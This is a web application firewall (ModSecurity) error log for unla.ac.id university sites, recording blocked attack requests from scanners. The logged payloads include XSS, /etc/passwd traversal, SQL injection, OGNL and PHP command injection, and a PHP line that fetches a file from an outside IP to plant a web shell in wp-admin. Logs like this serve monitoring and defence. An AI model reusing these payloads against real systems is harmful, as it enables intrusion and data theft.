[Tue Aug 29 11:57:31.686304 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAq@srAAAAAM"]
[Tue Aug 29 11:57:31.706586 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAocyuQAAAAR"]
[Tue Aug 29 11:57:31.710132 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAriwhoAAAAK"]
[Tue Aug 29 11:57:31.715964 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAArbWcUAAAAG"]
[Tue Aug 29 11:57:32.535736 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAAoz8iQAAAAS"]
[Tue Aug 29 11:57:32.718911 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAAocyukAAAAR"]
[Tue Aug 29 11:57:32.736117 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAAq@srgAAAAM"]
[Tue Aug 29 11:57:32.761166 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16vMCo-f0AAAnEqfUAAAAO"]
[Tue Aug 29 11:57:33.539968 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAocyuwAAAAR"]
[Tue Aug 29 11:57:33.542164 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAArbWccAAAAG"]
[Tue Aug 29 11:57:33.546689 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAArdQlEAAAAI"]
[Tue Aug 29 11:57:33.553047 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAArh0VsAAAAC"]
[Tue Aug 29 11:57:33.575184 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAArLLl8AAAAb"]
[Tue Aug 29 11:57:33.596565 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAArLLmAAAAAb"]
[Tue Aug 29 11:57:33.620431 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16vcCo-f0AAArePOEAAAAJ"]
[Tue Aug 29 11:57:33.638717 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAoz8i0AAAAS"]
[Tue Aug 29 11:57:33.680746 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAAnEqfwAAAAO"]
[Tue Aug 29 11:57:34.662535 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vsCo-f0AAArePOkAAAAJ"]
[Tue Aug 29 13:36:34.116243 2023] [:error] [pid 4655] [client 103.176.97.149] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.142.173.55_fa563e8676d4073c15d652c2ebfac62afd52db95"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/menu/bgmenu.png"] [unique_id "ZO2R8cCo-f0AABIvOjMAAAAL"]
[Tue Aug 29 14:11:17.638359 2023] [:error] [pid 5690] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.5.109.233_75feb17e33c8ef3c49ada150ddfee16de12437dd"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/panel/top-bottom.gif"] [unique_id "ZO2aFcCo-f0AABY6Q60AAAAG"]
[Tue Aug 29 14:11:17.638401 2023] [:error] [pid 5481] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "180.245.138.24_ee0817539750722d9fda14d343ddec741c55c841"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/panel/left-right.gif"] [unique_id "ZO2aFcCo-f0AABVpQfIAAAAb"]
[Tue Aug 29 14:11:17.638583 2023] [:error] [pid 5689] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.5.109.233_75feb17e33c8ef3c49ada150ddfee16de12437dd"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/dd/drop-no.gif"] [unique_id "ZO2aFcCo-f0AABY5KwYAAAAF"]
[Tue Aug 29 14:11:17.638712 2023] [:error] [pid 5691] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "180.245.138.24_ee0817539750722d9fda14d343ddec741c55c841"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/grid/grid3-hrow.gif"] [unique_id "ZO2aFcCo-f0AABY7W84AAAAH"]
[Tue Aug 29 15:00:18.184196 2023] [:error] [pid 6810] [client 180.244.134.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "10.179.80.147_2f20390f4bf2c71a212308cf7c6fbb784b1f8cbf"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/daftar_usm.js"] [unique_id "ZO2lkcCo-f0AABqa-r4AAAAS"]
[Tue Aug 29 15:00:18.184286 2023] [:error] [pid 6866] [client 180.244.134.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.142.173.41_07f4681311a44e45ec5ab6d0cf8f40adc90dc400"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/studentbody.js"] [unique_id "ZO2lksCo-f0AABrSX3MAAAAY"]
[Tue Aug 29 15:00:18.184312 2023] [:error] [pid 6804] [client 180.244.134.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.142.173.41_07f4681311a44e45ec5ab6d0cf8f40adc90dc400"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/karturencanastudi.js"] [unique_id "ZO2lksCo-f0AABqUGdcAAAAC"]
[Tue Aug 29 15:00:18.184396 2023] [:error] [pid 6856] [client 180.244.134.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.142.173.41_07f4681311a44e45ec5ab6d0cf8f40adc90dc400"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/mappingruanganpmb.js"] [unique_id "ZO2lksCo-f0AABrIRoUAAAAI"]
[Tue Aug 29 15:00:18.190247 2023] [:error] [pid 6878] [client 180.244.134.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "140.213.168.14_5e07ee8a908dc231f4e8bd6f68261b2cc7251a5f"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/perwalian.js"] [unique_id "ZO2lksCo-f0AABreW8QAAAAb"]
[Tue Aug 29 15:39:06.516839 2023] [:error] [pid 7807] [client 168.61.155.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZO2uqsCo-f0AAB5-7WwAAAAF"]
[Tue Aug 29 11:18:53.430867 2023] [:error] [pid 604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO1xrcCo-f0AAAJcjl0AAAAD"]
[Tue Aug 29 11:18:55.546775 2023] [:error] [pid 680] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO1xr8Co-f0AAAKo48kAAAAO"]
[Tue Aug 29 11:30:11.238558 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAOM4TQAAAAU"]
[Tue Aug 29 11:30:11.460968 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10U8Co-f0AAAOKNlIAAAAK"]
[Tue Aug 29 11:30:12.597412 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10VMCo-f0AAAPNBPEAAAAZ"]
[Tue Aug 29 11:30:12.658860 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPNBPQAAAAZ"]
[Tue Aug 29 11:30:13.315773 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAANh1oAAAAAA"]
[Tue Aug 29 11:30:14.503480 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VsCo-f0AAAO-1nwAAAAI"]
[Tue Aug 29 11:30:15.350716 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAANjpwQAAAAT"]
[Tue Aug 29 11:30:15.363647 2023] [:error] [pid 965] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPFPf8AAAAR"]
[Tue Aug 29 11:30:16.343050 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgg9emrk4uaz8xj.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgg9emrk4uaz8xj.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgg9emrk4uaz8xj.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAOOuS0AAAAW"]
